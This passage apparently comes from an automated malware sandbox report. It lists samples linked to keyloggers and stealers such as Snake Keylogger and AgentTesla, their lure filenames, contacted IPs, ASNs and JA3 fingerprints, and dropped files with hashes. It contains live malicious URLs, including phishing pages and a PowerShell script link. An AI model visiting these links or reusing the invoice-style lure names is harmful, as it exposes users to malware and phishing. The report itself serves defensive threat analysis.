	z74fBF2ObiS1g87mbS.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	come.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	132.226.8.169
	INVOICE.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	132.226.8.169
	QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	z19UrgentOrder.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.6.168
	Fa24c148.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.247.73
api.telegram.org	M2AB8BeHc4.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Proforma-Invoice#018879TT0100..doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	swift-copy31072024PDF.html	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	Fedex.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	come.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	Fa24c148.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	AWB#21138700102.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	z45paymentadvice.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	rFa24c148.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	PbfYaIvR5B.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	M2AB8BeHc4.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Proforma-Invoice#018879TT0100..doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	swift-copy31072024PDF.html	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	Fedex.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	come.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	Fa24c148.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	AWB#21138700102.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	z45paymentadvice.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	rFa24c148.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	PbfYaIvR5B.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220
CLOUDFLARENETUS	M2AB8BeHc4.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	Swift Copy.xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	188.114.97.3
	Payment Advice.xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	104.21.74.191
	Bill Of Lading.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.97.3
	Bill_Of _Lading.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	ST007 SWIFT CONFIRMATION.xls	Get hash	malicious	Unknown	Browse	188.114.97.3
	Proforma-Invoice#018879TT0100..doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	swift-copy31072024PDF.html	Get hash	malicious	HTMLPhisher	Browse	1.1.1.1
	ST007 SWIFT CONFIRMATION.xls	Get hash	malicious	Unknown	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
UTMEMUS	Bill Of Lading.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	Proforma-Invoice#018879TT0100..doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	dekont_001.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	come.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	132.226.8.169
	INVOICE.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	132.226.8.169
	Fa24c148.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.247.73
	z1RECONFIRMPAYMENTINVOICE.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	132.226.247.73
	AWB#21138700102.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	na.doc	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	na.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
AS-26496-GO-DADDY-COM-LLCUS	nklarm5.elf	Get hash	malicious	Unknown	Browse	104.238.97.228
	7950COPY.exe	Get hash	malicious	FormBook	Browse	198.12.233.232
	https://23.245.109.208.host.secureserver.net/E5V7V5K0D7J7U1G8T1M8U3B4G7B4C0Y7M4M4N1J5K4K6Y6N5R4&c=E,1,OlGTQS9-XwC2vBMWr7I6ylXZJam5iCAEz8vCZAxOsyVrFii_1IhqZZqiTz_dLP-ondxd1F0_mQoffiXjC_RNTQQ_48xVwrK55zuEfYrxqUa2Wr6UOEIpqcM,&typo=1	Get hash	malicious	Unknown	Browse	208.109.245.23
	https://23.245.109.208.host.secureserver.net/E5V7V5K0D7J7U1G8T1M8U3B4G7B4C0&c=E,1,2fln-18Rcg-_y13WFwFZvQn3f1CXlYk0J_eiM8RKZuA6Djx49SsFA5in1hnyQJXLjWW1L6y7WaZ9eFSqcAvQerMcOF3C93rx-F5tfSihNA,,&typo=1	Get hash	malicious	Unknown	Browse	208.109.245.23
	la.bot.powerpc.elf	Get hash	malicious	Unknown	Browse	198.12.169.138
	yGktPvplJn.exe	Get hash	malicious	Pushdo	Browse	107.180.98.101
	la.bot.sparc.elf	Get hash	malicious	Unknown	Browse	184.168.52.128
	link.txt	Get hash	malicious	HTMLPhisher	Browse	148.66.159.213
	http://nativestories.org/	Get hash	malicious	HTMLPhisher	Browse	107.180.57.162
	QUOTE2342534.exe	Get hash	malicious	FormBook	Browse	118.139.178.37

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	M2AB8BeHc4.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	Bill Of Lading.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.97.3
	dekont_001.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	https://docs.google.com/drawings/d/1O7L6jnunpKYYRy1ZXX5DN4ENeZ4pxxWF8BG0mcDdFi0/preview?pli=1ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVe	Get hash	malicious	HTMLPhisher	Browse	188.114.97.3
	z74fBF2ObiS1g87mbS.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	https://docs.google.com/drawings/d/1JRNFh_1Cbzym_iLfw5aw8-eo7G0EKRf1L0-MpuWvb2k/preview?pli=1MiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqG	Get hash	malicious	Unknown	Browse	188.114.97.3
	https://docs.google.com/drawings/d/14Q1EGmG0TWb0poSuSYwhNHZWOm-kG4Jlnk5Hg076lVI/preview?pli=132E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWl	Get hash	malicious	Mamba2FA	Browse	188.114.97.3
	come.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.97.3
	INVOICE.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	188.114.97.3
	QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
3b5074b1b5d032e5620f69f9f700ff0e	M2AB8BeHc4.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Bill_Of _Lading.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	IGNM2810202400017701_270620240801_546001.vbs	Get hash	malicious	GuLoader	Browse	149.154.167.220
	https://clairecarpenter.com/wp-includes/css/pbcmc.php?7112797967704b536932307466507a4373757943784b5463314a54533470796b784f7a456e567130725553383750315338317430677031416341#Email#	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	149.154.167.220
	https://filerit.com/pi-240924.ps1	Get hash	malicious	Unknown	Browse	149.154.167.220
	JVLkkfzSKW.exe	Get hash	malicious	Stealc, Vidar	Browse	149.154.167.220
	Shipping documents 00029399400059.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Quasar, Stealc	Browse	149.154.167.220
	z20SWIFT_MT103_Payment_552016_pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	149.154.167.220

Process:	C:\Users\user\Desktop\rShippingDocuments240384.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\tdcorV.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\tdcorV.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.380805901110357
Encrypted:	false
SSDEEP:	48:lylWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//Z8vUyus:lGLHyIFKL3IZ2KRH9Ouggs
MD5:	B171BCCDDA0A76C24B6654C5D4CF3B80
SHA1:	E1012D8FA07FC3BF4E00342EB9E94A5C83C8B8BD
SHA-256:	C9854D03D91051DA649CC5880DE7848FEF51ACE5B4B5E399272A851AB1A317B2
SHA-512:	F40CC9DDE5DCB432D2D0F4C1B641624F5B90EABC185BFA8558891F3977F38B63C6E226AB140B18DF8A70BB86F8B15878DE5B60CB35F31CA241F1755687A19E24
Malicious:	false
Preview:	@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1myx12ag.trk.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2uc2muka.4ty.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2wc4svgu.rji.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2yorotv0.xwp.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dg5idzg5.erb.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gkgu4j4c.whd.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
